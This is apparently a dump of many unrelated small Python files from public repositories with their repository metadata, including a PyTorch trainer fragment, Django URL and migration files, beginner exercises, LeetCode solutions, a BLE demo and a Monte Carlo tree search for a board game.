self.writer.add_scalar('eval_loss', eval_loss, epoch)
self.writer.add_scalar('eval_acc', eval_acc, epoch)
# self.writer.add_scalar('lr', self.scheduler.get_lr()[0])
# save the model
if eval_acc >= best_acc:
best_acc = eval_acc
self.logger.info("New best score!")
self.save_model()
def predict(self, premise, hypothesis):
"""Prediction.
Arguments:
premise {torch.Tensor} -- [batch, seq_len]
hypothesis {torch.Tensor} -- [batch, seq_len]
Returns:
pres {torch.Tensor} -- [batch]
"""
self.model.eval() # evaluation mode
with torch.no_grad():
outputs = self.model(premise, hypothesis) # outpus: [batch, num_classes]
_, preds = torch.max(outputs, 1)
return preds
def get_report(self, dataset, target_names=None):
"""Test the model and print out a report.
"""
pred_class, label_class = [], []
for batch in dataset:
batch_data = to_device(batch, self.args.device)
preds = self.predict(batch_data['premise'], batch_data['hypothesis'])
pred_class += preds.tolist()
label_class += (batch_data['label']).tolist()
self.logger.info('\n')
self.logger.info(classification_report(label_class, pred_class,
target_names=target_names))
return pred_class, label_class
|
[
"c_meng@outlook.com"
] |
c_meng@outlook.com
|
5b5c8f567d442b7d3f5b766199727996bd5699bd
|
e994e9c74a7f4b95ed28ce53e86d5715769f8137
|
/admin/feeds/urls.py
|
3de1c6809fcd64f66f348291763e01d4c58179d6
|
[] |
no_license
|
wechulimaven/lutterD-jangoA-PI
|
0773c07a78d3a78c46d374499b82251beaffa6e7
|
c932d1fd0969cdb7d1f0057c6a4f284768e0bef3
|
refs/heads/main
| 2023-03-22T09:16:29.873629
| 2021-03-20T23:19:40
| 2021-03-20T23:19:40
| 349,767,897
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 275
|
py
|
from django.urls import path
from .views import UserRecordView, feedEditAddPostList, feedPostsList
urlpatterns = [
path('', feedPostsList.as_view()),
path('<int:pk>/', feedEditAddPostList.as_view()),
path('user/', UserRecordView.as_view(), name='users'),
]
|
[
"mavenwechuli@gmail.com"
] |
mavenwechuli@gmail.com
|
e607164ee72ed5d0071b455388700dbe366a225e
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_windlasses.py
|
6ee113296ad40900fcef0fed2db7fb643eaa9caf
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 232
|
py
|
# class header
class _WINDLASSES():
def __init__(self,):
self.name = "WINDLASSES"
        self.definitions = "windlass"
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['windlass']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
0e3874a0fdfbd8a253c22505d38822612cf2a233
|
78c25dc9d381286209565e94ab24fe10a0924137
|
/bigneuron_app/fleet/tasks.py
|
58f2a8b4209f809a15c437c0550b8ecd4916a62a
|
[] |
no_license
|
Freshwood/vaa3d-api
|
c8c5d044c355685395d7b433e90d7759cad88b08
|
aeb3f22b2ab384f98d8ed0657645008430e78135
|
refs/heads/master
| 2020-05-27T23:59:34.053831
| 2016-02-06T18:58:01
| 2016-02-06T18:59:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 479
|
py
|
import time
import traceback
from bigneuron_app import tasks_log
from bigneuron_app.fleet import fleet_manager
FLEET_UPDATE_SLEEP=60
FLEET_UPDATE_MAX_RUNS=20
def update_fleet():
count = 0
while count < FLEET_UPDATE_MAX_RUNS:
try:
tasks_log.info("Update Jobs and JobItems Fleets. Attempt " + str(count))
fleet_manager.update_fleet_capacity()
except Exception, err:
tasks_log.error(traceback.format_exc())
finally:
count += 1
time.sleep(FLEET_UPDATE_SLEEP)
|
[
"fortuner@amazon.com"
] |
fortuner@amazon.com
|
8c8e0126b4969636ebe2d414567e598beb70bf2c
|
e9a9955da9bee9be6580f1b1a75f97a1f99d0289
|
/login/migrations/0016_auto_20190803_1452.py
|
eb4f2ea18f1fff82b8ba290db60a29457a52f715
|
[] |
no_license
|
Manjunatha1997/project_IT
|
bdb36142256b9d4eb1b75a76994d801dd3c33013
|
fe58a30d033d4f4ed818c0282a802fafcf3aaff5
|
refs/heads/master
| 2021-02-28T04:17:13.872903
| 2020-03-07T15:48:49
| 2020-03-07T15:48:49
| 245,661,299
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 637
|
py
|
# Generated by Django 2.1.7 on 2019-08-03 14:52
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0015_auto_20190803_0435'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='dob',
field=models.DateField(default=datetime.datetime(2019, 8, 3, 14, 52, 29, 693918)),
),
migrations.AlterField(
model_name='profile',
name='doj',
field=models.DateField(default=datetime.datetime(2019, 8, 3, 14, 52, 29, 693948)),
),
]
|
[
"lovelymanju198@gmail.com"
] |
lovelymanju198@gmail.com
|
9a78b5d66a23140e8ef2d9c21dd84cfc729271a3
|
701d7413adc68a4f05fbb96e7981646e7bb3bee8
|
/fh/opl/Solutions-session5/Solutions-new/ex4_perfectsupto.py
|
1359ad1d660fc5f4bd7d0338157b238316a8e3a7
|
[] |
no_license
|
emildekeyser/tutoring
|
ee9311a0b65879284d33cdf154de3dac6b735f03
|
512593cd96247ae84c619a64279d0051c3ac16f9
|
refs/heads/master
| 2020-11-27T01:39:48.486085
| 2019-12-20T12:25:35
| 2019-12-20T12:25:35
| 197,552,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 590
|
py
|
# Calculate the sum of all proper divisors of n (divisors smaller than n)
def sum_of_proper_divisors(n):
s = 1
for i in range(2, n):
# Check if i divides n and if it does, add it to the sum s
if n % i == 0:
s += i
return s
def is_perfect(n):
return n == sum_of_proper_divisors(n)
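# For example (worked check, not in the original): sum_of_proper_divisors(6) == 1 + 2 + 3 == 6,
# so is_perfect(6) is True; the next perfect number is 28 == 1 + 2 + 4 + 7 + 14.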
def perfects_up_to(n):
for i in range(2,n):
if is_perfect(i):
# Print consecutive i's on the same line
print(i, end="\t")
def main():
n = int(input("Enter a number: "))
print("All perfect numbers up to %d are : " % n)
perfects_up_to(n)
main()
|
[
"emil.dekeyser@student.ucll.be"
] |
emil.dekeyser@student.ucll.be
|
5ea85b5d4ab127194e35ce410732ed286cdba869
|
0c7f3810d822595b55f70f2c9d87f5f2c98054e6
|
/fondos/download.py
|
01b3cc38e731884bfa1e9013bb78fd5c1822ae4e
|
[
"MIT"
] |
permissive
|
elsonidoq/fondos
|
c1b406ed85c1499546352bb704ad4c12dea78f6c
|
7d673865b929da6aba0757962e7d287c82edb1b6
|
refs/heads/master
| 2021-04-29T02:06:47.748040
| 2017-05-20T18:32:23
| 2017-05-20T18:32:23
| 78,062,720
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 373
|
py
|
import os
from datetime import datetime
from invertironline import InvertirOnlineDownloader
here = os.path.abspath(os.path.dirname(__file__))
def main():
bonds = [
'aa17',
'ay24'
]
print "Downloading {}".format(datetime.now())
for bond in bonds:
InvertirOnlineDownloader(bond).execute()
if __name__ == '__main__':
main()
|
[
"elsonidoq@gmail.com"
] |
elsonidoq@gmail.com
|
501c95b652f857f01708a965721f3e01f47337a9
|
f07b7f546278c86ec91fe9fdacbe4acc266b5ef0
|
/blog/blog/wvenv/Lib/site-packages/pyls/_version.py
|
1da11f8698d1b8e9027b628af4386644dc9ed2ca
|
[] |
no_license
|
CankayaUniversity/ceng-407-408-2019-2020-Patent-Comparison-System
|
0386a6d8651a9ce875a9cf56013c19d8242204c9
|
d9c0f2d84d90932b962a0618b01652f3bd560f25
|
refs/heads/master
| 2020-08-18T09:55:23.676188
| 2020-06-27T21:19:20
| 2020-06-27T21:19:20
| 215,772,427
| 2
| 4
| null | 2020-06-27T21:26:31
| 2019-10-17T11:08:50
| null |
UTF-8
|
Python
| false
| false
| 498
|
py
|
# This file was generated by 'versioneer.py' (0.18) from
# revision-control system data, or from the parent directory name of an
# unpacked source archive. Distribution tarballs contain a pre-generated copy
# of this file.
import json
version_json = '''
{
"date": "2020-01-21T17:27:49+0000",
"dirty": false,
"error": null,
"full-revisionid": "fc2ab66c5e447fb5fbd5941bfc9e070906689969",
"version": "0.31.7"
}
''' # END VERSION_JSON
def get_versions():
return json.loads(version_json)
|
[
"33146580+celkansimay@users.noreply.github.com"
] |
33146580+celkansimay@users.noreply.github.com
|
44f7d5e6d9055b7acb7c3147d5e6aa735fc3ce3e
|
a09e70355b756bd5cba55246e17eb0480af6257b
|
/examples/ble_demo_central.py
|
eb56a9cb9b54270e50eb0709aed3104e43dfecc4
|
[
"MIT"
] |
permissive
|
devoh747/Adafruit_CircuitPython_BLE
|
9735381dc3481661af54ac32d89ec40e006edc5b
|
7566483e2dbdb1bf6c71d5629a2ed37b113c7cff
|
refs/heads/master
| 2020-08-09T04:14:59.774817
| 2019-10-10T21:11:07
| 2019-10-10T21:11:07
| 213,995,226
| 0
| 0
|
MIT
| 2019-10-09T18:33:32
| 2019-10-09T18:33:32
| null |
UTF-8
|
Python
| false
| false
| 1,319
|
py
|
"""
Demonstration of a Bluefruit BLE Central. Connects to the first BLE UART peripheral it finds.
Sends Bluefruit ColorPackets, read from three potentiometers, to the peripheral.
"""
import time
import board
from analogio import AnalogIn
#from adafruit_bluefruit_connect.packet import Packet
# Only the packet classes that are imported will be known to Packet.
from adafruit_bluefruit_connect.color_packet import ColorPacket
from adafruit_ble.scanner import Scanner
from adafruit_ble.uart_client import UARTClient
def scale(value):
"""Scale an value from 0-65535 (AnalogIn range) to 0-255 (RGB range)"""
return int(value / 65535 * 255)
scanner = Scanner()
uart_client = UARTClient()
a3 = AnalogIn(board.A3)
a4 = AnalogIn(board.A4)
a5 = AnalogIn(board.A5)
while True:
uart_addresses = []
# Keep trying to find a UART peripheral
while not uart_addresses:
uart_addresses = uart_client.scan(scanner)
uart_client.connect(uart_addresses[0], 5)
while uart_client.connected:
r = scale(a3.value)
g = scale(a4.value)
b = scale(a5.value)
color = (r, g, b)
print(color)
color_packet = ColorPacket(color)
try:
uart_client.write(color_packet.to_bytes())
except OSError:
pass
time.sleep(0.3)
|
[
"halbert@halwitz.org"
] |
halbert@halwitz.org
|
a34b60332da3cc2b916a9aa39e89a5d34abc28c3
|
59527a2f36edfec1cb3a06cd93864555d62cd7eb
|
/PythonCoreProgramming/chapter3/makeTextFile.py
|
c15ae4fa6348f7f662ae3c222006404dae7a182f
|
[] |
no_license
|
xiao2mo/MachineLearningInAction-1
|
e4559fdf54128316e5655f15269f371b687b959a
|
48fb1faa16827cd0fbeac6ae05358e5fdf5f9e90
|
refs/heads/master
| 2021-01-21T21:05:54.175565
| 2017-06-10T05:53:56
| 2017-06-10T05:53:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 660
|
py
|
#coding:utf-8
import os
if __name__ == '__main__':
    # Get the file name
    while True:
        fname = raw_input('Enter file name: ');
        if os.path.exists(fname):
            print 'file: %s already exists' %fname
else:
break;
fileContent = []
    print '\n Enter file content, if you want to quit, type .'
while True:
entry = raw_input('>')
if entry == '.':
break;
else:
fileContent.append(entry)
    # Write fileContent to the file
    fw = open(fname, 'w') # open in write mode
fw.write('\n'.join(fileContent))
fw.flush()
fw.close()
print 'Done!'
|
[
"codercuixin@gmail"
] |
codercuixin@gmail
|
ce9e940c44787a1a33a27df098898d8d46a918ce
|
eb8e13ec2997b6047be54ac9b859ece6f0b9baa3
|
/File_Reading.py
|
c6ca8e2d55ce02d5663653d420de9b8f62e23c18
|
[] |
no_license
|
Zidane786/Learning-Python
|
2a7f1eb2fd80a105afe5f73dc29fbc134f0e1208
|
8038582748263fe905f3412eb9209f1299719bd1
|
refs/heads/master
| 2020-12-06T07:19:39.047544
| 2020-05-02T09:45:57
| 2020-05-02T09:45:57
| 232,387,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,885
|
py
|
# ***Opening a file and reading it as a text file***:-
# open_file=open("Zidane.txt", 'rt') # Here 'rt' is the default mode, where r means read and t means text
# Read_File=open_file.read()
# print(Read_File)
# open_file.close() # It is a good habit to close the file when the work is done, because we need to free memory once we are finished
"""
OUTPUT:-
Zidane is Great
Zidane is Really Great
Zidane is Really Really Great
Zidane is Really Really Really Great
Zidane is Really Really Really Really Great
"""
# ***Read And Binary*** :-
# open_file1=open("Zidane.txt","rb")
# Read_File1=open_file1.read()
# print(Read_File1) # Give Output in Binary String Form
"""
OUTPUT:-
b'Zidane is Great\nZidane is Really Great\nZidane is Really Really Great\nZidane is Really Really Really Great\nZidane is Really Really Really Really Great'
"""
# ***Passing an argument to the read() function***:-
# Open=open("Zidane.txt")
# Read=Open.read(2)
# print(Read)
# Read=Open.read(3)
# print(Read) # the earlier read(2) returned 'Zi'; read(3) continues from there, i.e. 'dan'. See the output for better understanding
"""
OUTPUT:-
Zi
dan
"""
# ***If we want to print the content of the file line by line, we can do it the following way***:-
# Open=open("Zidane.txt")
# for line in Open:
# print(line,end="")
"""
OUTPUT:-
Zidane is Great
Zidane is Really Great
Zidane is Really Really Great
Zidane is Really Really Really Great
Zidane is Really Really Really Really Great
"""
# *** readline() Function***:-
# Open=open("Zidane.txt")
# print(Open.readline(),end="") # readline() reads a single line; to read multiple lines we have to call it multiple times
# print(Open.readline(),end="") # it also reads the trailing newline character, which is why we pass end=""
# print(Open.readline(),end="")
# print(Open.readline(),end="")
# print(Open.readline(),end="")
"""
OUTPUT:-
Zidane is Great
Zidane is Really Great
Zidane is Really Really Great
Zidane is Really Really Really Great
Zidane is Really Really Really Really Great
"""
# *** readlines() Function (it creates a list)***:-
Open=open("Zidane.txt")
print(Open.readlines()) # every line is stored in the list, along with its newline character
"""
OUTPUT:-
['Zidane is Great\n', 'Zidane is Really Great\n', 'Zidane is Really Really Great\n', 'Zidane is Really Really Really Great\n', 'Zidane is Really Really Really Really Great']
"""
Open.close() # good habit to close the file when the work is done
|
[
"noreply@github.com"
] |
Zidane786.noreply@github.com
|
d766d4c5a78e044a4c3b133cff4e77e12c3e4d4f
|
ce7b21a1a9a79322db296a7ffb5dca23c3f53e8d
|
/exam/bin/django-admin.py
|
a5aa180a78eeba16a34a8bf08830073c2cec94ca
|
[] |
no_license
|
letyougo/exam
|
c8f11f25c4d4e2ab18fdbbf853f13939a41a7079
|
a6832790927abf36a80263d4c23efede0976fcc7
|
refs/heads/master
| 2021-08-19T08:16:34.385755
| 2017-11-25T12:12:40
| 2017-11-25T12:12:40
| 112,000,871
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 170
|
py
|
#!/Users/xiaoxiaosu/Documents/miui-2017/exam/exam/bin/python3.5
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
[
"surui1@xiaomi.com"
] |
surui1@xiaomi.com
|
f17669184ef2e9e58cc9613ffd6e8add89126ea3
|
09e8c92187ff8d7a726727041e2dd80850dcce3d
|
/leetcode/028_implement_strStr_TRICKY.py
|
7154dcc9281455ccd29a545cb11042da6c8c43ad
|
[] |
no_license
|
kakru/puzzles
|
6dd72bd0585f526e75d026f3ba2446b0c14f60e0
|
b91bdf0e68605f7e517446f8a00b1e0f1897c24d
|
refs/heads/master
| 2020-04-09T09:47:31.341475
| 2019-05-03T21:24:41
| 2019-05-03T21:24:41
| 160,246,660
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,846
|
py
|
#!/usr/bin/env python3
import unittest
class Solution:
def strStr(self, haystack, needle):
"""
:type haystack: str
:type needle: str
:rtype: int
"""
h_len = len(haystack)
n_len = len(needle)
i = 0
while i <= h_len - n_len:
if haystack[i:i+n_len] == needle:
return i
i += 1
return -1
#
# There is a problem with a step by step solution it's easy to forget about:
# haystack="mississippi", needle="issippi"
# mississippi
# issippi --> X
# mississippi
# issippi --> OK
# the loop index on the haystack cannot go back to 0 !!
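# As a cross-check (not part of the original solution), Python's built-in str.find
# implements the same contract: index of the first occurrence, 0 for an empty needle,
# and -1 when the needle is absent, so it can be used to sanity-check the tests below.
def str_str_builtin(haystack, needle):
    """Reference implementation using str.find, for comparison only."""
    return haystack.find(needle)

assert str_str_builtin("hello", "ll") == 2
assert str_str_builtin("abc", "") == 0
assert str_str_builtin("mississippi", "issippi") == 4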
class BasicTest(unittest.TestCase):
def test_1(self):
input_ = "hello", "ll"
expected_output = 2
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_2(self):
input_ = "helo", "ll"
expected_output = -1
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_3(self):
input_ = "abc", ""
expected_output = 0
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_4(self):
input_ = "abc"*100000, "cab"
expected_output = 2
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_5(self):
input_ = "a", "a"
expected_output = 0
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
def test_6(self):
input_ = "mississippi", "issippi"
expected_output = 4
output = Solution().strStr(*input_)
self.assertEqual(output, expected_output)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
[
"karol@kruzelecki.com"
] |
karol@kruzelecki.com
|
d8068915b32c07cb896a8397d6b917f876d3b5fe
|
4549c02dac55f2b8ed113ddacf95264630d91698
|
/Predict/__init__.py
|
022ca012e6428d9d89aadfa04b3b27bb059bca6b
|
[] |
no_license
|
kiminh/GPA
|
43077bb59797a096e3660b226642c5fe091a9663
|
29c5ffd8d7aa1bc3ebe6d83d1e55a997a04e4b60
|
refs/heads/master
| 2021-02-10T20:45:35.581410
| 2020-01-14T08:59:00
| 2020-01-14T08:59:00
| 244,417,955
| 1
| 0
| null | 2020-03-02T16:23:00
| 2020-03-02T16:23:00
| null |
UTF-8
|
Python
| false
| false
| 98
|
py
|
# -*- coding: utf-8 -*-
# @Time : 2019/11/19 10:58
# @Author : zxl
# @FileName: __init__.py.py
|
[
"791057615@qq.com"
] |
791057615@qq.com
|
d8b19ae42d91ddaf031dcf7c3a036edde31b414e
|
41aa400850af639e8d2ef4da7c65a566e3ff5a54
|
/Object_Oriented_Programs/Inventory_data.py
|
2696c04edc2fe332e64355e2774c02d351a90c2e
|
[] |
no_license
|
ravindraindia4u/Python
|
e1159df5eeea6b93ad42063644eaca375ca96f72
|
b1915958a524f4f2e6b80cff423cd7bc72834fa8
|
refs/heads/master
| 2022-04-27T17:45:35.653000
| 2020-05-01T21:15:30
| 2020-05-01T21:15:30
| 259,142,416
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 425
|
py
|
"""
Read the inventory JSON file and print its contents
"""
import json
def main():
file = open("inventory", 'r')
data = json.load(file)
file.close()
for key, value in data.items():
print(f"The {key} details are as follows: ")
for dictionary in value:
for keys, values in dictionary.items():
print(f"\t\t{keys} : {values}")
print()
main()
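# A hypothetical shape of the "inventory" file that the loops above expect
# (illustrative only; the actual file is not included in this snippet):
# {"Laptops": [{"brand": "X", "price": 1000}, {"brand": "Y", "price": 800}],
#  "Monitors": [{"brand": "Z", "size": 24}]}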
|
[
"ravindraindia4u@gmail.com"
] |
ravindraindia4u@gmail.com
|
095d0bb99bf369d801675140f71509f3c30b20fc
|
2c28ecef182aab6f57f8ca1195aca33ae5061cc4
|
/AutomateTheBoringStuff/commaCode.py
|
574ce040aa387c04db5862594c8eb0149a52b47c
|
[] |
no_license
|
MarcHiggins/LearningPython
|
b5b39ec80b1f6959bf24d55cb5c86200ab82fd67
|
dba2fac74b37ac0038b109c00720a71c0b57109b
|
refs/heads/master
| 2022-09-17T22:04:55.753942
| 2020-06-05T18:10:03
| 2020-06-05T18:10:03
| 267,947,875
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 547
|
py
|
## Aim is to print a list with all items separated by a comma
## and a space, with 'and' inserted before the last item
##Test one with a simple, user defined list
spam = ['apples', 'bananas', 'tofu', 'cats']
print(spam)
def andlist(x):
x.insert(-1, 'and')
print(*x, sep = ", ")
andlist(spam)
print(*spam)
## Test two: generate a long list and call the function on this
import random
randomDNA = []
dna = ["A", "T", "G", "C"]
for i in range (0,100):
randomDNA +=random.choice(dna)
print(randomDNA)
andlist(randomDNA)
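## A variant (not from the original) that yields "apples, bananas, tofu and cats"
## with no extra comma around 'and'; it assumes a non-empty list of strings.
def comma_join(items):
    if len(items) == 1:
        return items[0]
    return ", ".join(items[:-1]) + " and " + items[-1]
print(comma_join(['apples', 'bananas', 'tofu', 'cats']))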
|
[
"marcghiggins@gmail.com"
] |
marcghiggins@gmail.com
|
a9d884d274c01dd78cceab6370265d03f5fafe07
|
c7ab842b33195cf026b3a93ef38814ce3ea6309e
|
/Reed-Solomon/main.py
|
aff0b3b81d06e0755c525ab2998b20c8cff029d5
|
[] |
no_license
|
kizcko/Number-Theory
|
7f2429d7d1685b38338073f6603bce91e51106a5
|
aed1dba7a06a91eb0341d4fdc0bf1577d0809bc3
|
refs/heads/main
| 2023-04-20T18:55:06.584995
| 2021-05-17T15:09:59
| 2021-05-17T15:09:59
| 368,226,516
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 509
|
py
|
import decoding
from encoding import encoding
from decoding import *
m = 29
p = 11
s = 1
k = 3
def convert_to_ascii(text):
return "".join(str(ord(char)) for char in text)
if isinstance(m, str):
m = int(convert_to_ascii(m))
def main(m,p,s,k):
print("\nEncoding\n",20*'=')
print('\nm:', m)
initial = encoding(m, p, s, k)
print("\n\nDecoding\n", 20 * '=')
z = generate_z(initial,p)
print("\nZ:",z)
polynomial(p, z, k,s,initial)
main(m,p,s,k)
|
[
"noreply@github.com"
] |
kizcko.noreply@github.com
|
15f12151f6b78ab44e92344a457d76919163a256
|
e2af805086a86ec5e3526c503e56aacf291bff7d
|
/pv_mcts.pyx
|
f6cb74e6357e7d2dcb9361b56fee7187c63aed81
|
[] |
no_license
|
keisuke-777/CythonVerAlphaZeroForGeister
|
e21c7e44e83f58e63b4ae35487deba6d75b9b4cc
|
abf9b124fc2d335cf6086a98223d60883719cfc9
|
refs/heads/master
| 2023-03-22T11:33:05.838507
| 2021-03-10T02:21:48
| 2021-03-10T02:21:48
| 315,944,517
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,206
|
pyx
|
# ====================
# Building the Monte Carlo tree search
# ====================
# Package imports
from game import State
from dual_network import DN_INPUT_SHAPE
from math import sqrt
from tensorflow.keras.models import load_model
from pathlib import Path
import numpy as np
# Parameter setup
PV_EVALUATE_COUNT = 50 # number of simulations per inference
# Inference
def predict(model, state):
    # Reshape the input data for inference
    a, b, c = DN_INPUT_SHAPE
    x = np.array(state.pieces_array())
    x = x.reshape(c, a, b).transpose(1, 2, 0).reshape(1, a, b, c)
    # Run inference
    y = model.predict(x, batch_size=1)
    # Get the policy
    policies = y[0][0][list(state.legal_actions())] # legal moves only
    policies /= sum(policies) if sum(policies) else 1 # normalize to a probability distribution that sums to 1
    # Get the value
value = y[1][0][0]
return policies, value
# Convert a list of nodes to a list of visit counts
def nodes_to_scores(nodes):
scores = []
for c in nodes:
scores.append(c.n)
return scores
# Get the Monte Carlo tree search scores
def pv_mcts_scores(model, state, temperature):
    # Definition of a Monte Carlo tree search node
    class Node:
        # Initialize the node
        def __init__(self, state, p):
            self.state = state # state
            self.p = p # policy (prior probability)
            self.w = 0 # cumulative value
            self.n = 0 # visit count
            self.child_nodes = None # child nodes
        # Compute the value of the position
def evaluate(self):
            # When the game is over
            if self.state.is_done():
                # Get the value from the game result
                value = -1 # treat both losses and draws as -1 (needs tuning)
                # value = -1 if self.state.is_lose() else 0
                # Update the cumulative value and the visit count
                self.w += value
                self.n += 1
                return value
            # When there are no child nodes yet
            if not self.child_nodes:
                # Get the policy and value from the neural network inference
                policies, value = predict(model, self.state)
                # Update the cumulative value and the visit count
                self.w += value
                self.n += 1
                # Expand the child nodes
                self.child_nodes = []
                for action, policy in zip(self.state.legal_actions(), policies):
                    self.child_nodes.append(Node(self.state.next(action), policy))
                return value
            # When child nodes exist
            else:
                # Get the value by evaluating the child node with the highest PUCB score
                value = -self.next_child_node().evaluate()
                # Update the cumulative value and the visit count
self.w += value
self.n += 1
return value
        # Get the child node with the highest PUCB score
        def next_child_node(self):
            # Compute the PUCB (arc evaluation) values
            C_PUCT = 1.0
            t = sum(nodes_to_scores(self.child_nodes))
            pucb_values = []
            for child_node in self.child_nodes:
                pucb_values.append(
                    (-child_node.w / child_node.n if child_node.n else 0.0)
                    + C_PUCT * child_node.p * sqrt(t) / (1 + child_node.n)
                )
            # Return the child node with the highest PUCB score
            return self.child_nodes[np.argmax(pucb_values)]
    # Create the node for the current position
    root_node = Node(state, 0)
    # Run the evaluation multiple times
    for _ in range(PV_EVALUATE_COUNT):
        root_node.evaluate()
    # Probability distribution over the legal moves
    scores = nodes_to_scores(root_node.child_nodes)
    if temperature == 0: # only the maximum gets probability 1
action = np.argmax(scores)
scores = np.zeros(len(scores))
scores[action] = 1
    else: # add randomness with a Boltzmann distribution
scores = boltzman(scores, temperature)
return scores
# Select an action with Monte Carlo tree search
def pv_mcts_action(model, temperature=0):
def pv_mcts_action(state):
scores = pv_mcts_scores(model, state, temperature)
return np.random.choice(state.legal_actions(), p=scores)
return pv_mcts_action
# Boltzmann distribution
def boltzman(xs, temperature):
xs = [x ** (1 / temperature) for x in xs]
return [x / sum(xs) for x in xs]
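# Illustrative check (not from the original source): with temperature 1.0 the scores are
# only normalized, e.g. boltzman([1, 2, 3], 1.0) gives [1/6, 2/6, 3/6]; temperatures
# below 1.0 sharpen the distribution toward the highest-scoring move.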
# Operation check
if __name__ == "__main__":
    # Load the model
    path = sorted(Path("./model").glob("*.h5"))[-1]
    model = load_model(str(path))
    # Create the state
    state = State()
    # Create the function that selects actions with Monte Carlo tree search
    next_action = pv_mcts_action(model, 1.0)
    # Loop until the game ends
    while True:
        # When the game is over
        if state.is_done():
            break
        # Get the action
        action = next_action(state)
        # Get the next state
        state = state.next(action)
        # Print the board as a string
        print(state)
|
[
"keisuke7771120@me.com"
] |
keisuke7771120@me.com
|
ea641622136b336a1f7196b18e51f101df6df097
|
d45bb44b0dfabfeff37c21a6ac0be1362782e39a
|
/utils/import_bookmarks.py
|
ea763b006243bdea76577f71ce07e8fba1168997
|
[] |
no_license
|
SyJarvis/BookmarkManager
|
c25f9df8cb0d0719de805f8080a7ae78c5ac529c
|
dc3baf06fd47c4514b148134ee3d3fa03f7f1571
|
refs/heads/master
| 2023-03-26T17:14:17.776441
| 2021-03-21T14:58:58
| 2021-03-21T14:58:58
| 322,634,112
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 647
|
py
|
from pyquery import PyQuery as pq
class BookmarksTodb():
def __init__(self, filename='utils/bookmarks_2020_5_5_win.html'):
with open(filename, 'r+', encoding='utf-8') as file:
self.html = file.read()
self.doc = pq(self.html)
def get_cage_list(self):
cage_li = []
items = self.doc('H3')
for cage in items:
cage_li.append(cage.text)
return cage_li
def get_url_list(self):
lis = self.doc('A').items()
datas = []
for li in lis:
url_params = {}
url_params['url'] = li.attr('href')
url_params['title'] = li.text()
print(url_params)
datas.append(url_params)
return datas
|
[
"1755115828@qq.com"
] |
1755115828@qq.com
|
26abf2b58ee4ed7a69f2c069c5026e46fd6d5427
|
419873dd3b7412f704b1a7907b64a60b44cedf39
|
/python/树/103. 二叉树的锯齿形层次遍历.py
|
b3b9739640c5bbaeecf8e7c3f913e970275761a9
|
[] |
no_license
|
Weless/leetcode
|
0585c5bfa260713f44dabc51fa58ebf8a10e7814
|
0566622daa5849f7deb0cfdc6de2282fb3127f4c
|
refs/heads/master
| 2021-11-13T07:59:20.299920
| 2021-10-25T02:09:53
| 2021-10-25T02:09:53
| 203,720,668
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 818
|
py
|
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
from typing import List
class Solution:
def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
from collections import deque
queue = deque()
queue.append(root)
res = []
level = 1
while queue:
tmp = []
for _ in range(len(queue)):
node = queue.popleft()
tmp.append(node.val)
if node.left: queue.append(node.left)
if node.right: queue.append(node.right)
if level % 2 == 0:
res.append(tmp[::-1])
else:
res.append(tmp)
level += 1
return res
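# Quick sanity check (added for illustration, using the LeetCode 103 example tree
# [3, 9, 20, null, null, 15, 7]); expected output is [[3], [20, 9], [15, 7]].
if __name__ == "__main__":
    root = TreeNode(3)
    root.left = TreeNode(9)
    root.right = TreeNode(20)
    root.right.left = TreeNode(15)
    root.right.right = TreeNode(7)
    print(Solution().zigzagLevelOrder(root))  # [[3], [20, 9], [15, 7]]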
|
[
"twzcxx1@163.com"
] |
twzcxx1@163.com
|
d73cb9b3bb88001eb961512b064822c5c3bc29b3
|
2214265044a4c141b9743e74cb04b87a2d08ce5a
|
/luminoth/utils/homedir.py
|
1e4a8098a8f7488ac2171c99c76ffa474d329f7c
|
[
"BSD-3-Clause"
] |
permissive
|
Chunde/luminoth
|
163bb4850d9526675e5e02414b07055a894cb794
|
4c1523460d41a69dc548262051779dc5037afb8d
|
refs/heads/master
| 2021-04-27T02:39:30.272615
| 2018-03-02T18:04:46
| 2018-03-02T18:54:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 602
|
py
|
"""Luminoth home (~/.luminoth) management utilities."""
import os
import tensorflow as tf
DEFAULT_LUMINOTH_HOME = os.path.expanduser('~/.luminoth')
def get_luminoth_home(create_if_missing=True):
"""Returns Luminoth's homedir."""
